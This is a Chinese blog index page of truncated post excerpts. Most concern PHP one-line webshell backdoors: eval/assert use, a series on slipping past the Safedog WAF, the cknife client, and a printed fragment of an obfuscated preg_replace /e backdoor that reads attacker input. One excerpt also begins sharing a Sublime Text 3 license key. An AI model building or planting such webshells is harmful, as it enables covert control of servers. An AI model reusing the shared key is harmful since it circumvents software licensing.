最近在做工具的時候遇到讀取兩個文件編碼不一致的情況，但實際情況并不是用iconv轉換就可以的那么簡單，因為其中一個編碼是ANSI，另一個是Unicode big endian，這時候用函數mb_detect_encoding 都識別不了編碼，更別想用幾個函數就能簡單轉換了。 不過google到了一個不錯的php類，引入即可。 ?<?php /…繼續閱讀 »

eval與assert都算是元老級一句話后門函數，其實很多情形下代碼的執行還是需要依靠eval去執行，只是前鋒路轉了而已。 eval與assert函數的用法大家可以自行百度。 eval與assert區別 eval函數中參數是字符，如： eval('echo 1;'); assert函數中參數為表達式 （或者為函數），如： assert(phpinfo()) assert(eval('ec…繼續閱讀 »

聲明： 本文由博主首發于：阿里先知?https://xianzhi.aliyun.com/forum/read/441.html 如需要轉載，請先聯系先知技術社區授權；未經授權請勿轉載。 上一篇：php一句話后門過狗姿勢萬千之理論篇【一】 第二章節主要帶給大家一些后門構造思路，與安全狗文件特征檢測的機制。 另外強調一下，這篇文章需…繼續閱讀 »

聲明： 本文由博主首發于：阿里先知?https://xianzhi.aliyun.com/forum/read/442.html 如需要轉載，請先聯系先知技術社區授權；未經授權請勿轉載。 先知技術社區投稿郵箱：Aliyun_xianzhi#service.alibaba.com   既然木馬已就緒，那么想要利用木馬，必然有一個數據傳輸的過程，數據提交是必須的，數據返回…繼續閱讀 »

聲明： 本文由博主首發于：阿里先知?https://xianzhi.aliyun.com/forum/read/441.html 如需要轉載，請先聯系先知技術社區授權；未經授權請勿轉載。 寫在前面： 過狗相關的資料網上也是有很多，所以在我接下來的文章中，可能觀點或者舉例可能會與網上部分雷同，或者表述不夠全面。 但是我只能說，我…繼續閱讀 »

最近研究過狗一句話有點走火入魔，目前研究了幾個版本的一句話，效果都還不錯。 授之于魚不如授之以漁，過幾天準備從理論層，代碼層，傳輸層寫個過狗連載教程。 目前我使用的是cknife軟件，類似于菜刀的開源軟件，雖然還有不少bug，但高度自由修改，不用擔心后門。我之所以沒有用菜刀，…繼續閱讀 »

今天偶然在土司看到一篇關于php后門的問題，讓我聯想到以前遇到過的一個一句話，共同點都是利用preg_replace中/e 修正符使replacement 參數當作 PHP 代碼來執行。 先來看下原版代碼 <?php $Base = "base6"."4"."_decod"."e"; $_clasc = $Base($_REQUEST['_exit']); $arr = array($Base($_POST['mcontent']) => '|.*|e',); @array_walk($arr, $_cla…繼續閱讀 »

sublime text 3是一個非常棒的編輯器，非常適合于程序猿寫代碼，好用之處自行百度。 這個編輯器激活與漢化的教程網上的方法五花八樣，這里給大家總結一個可用且簡單的方法，其實也就是官網的說明。 sublime text 3 3103 激活碼 —– BEGIN LICENSE —–Nicolas HennionSingle User LicenseEA7E-8660758A01AA83 1D668D24 4484A…繼續閱讀 »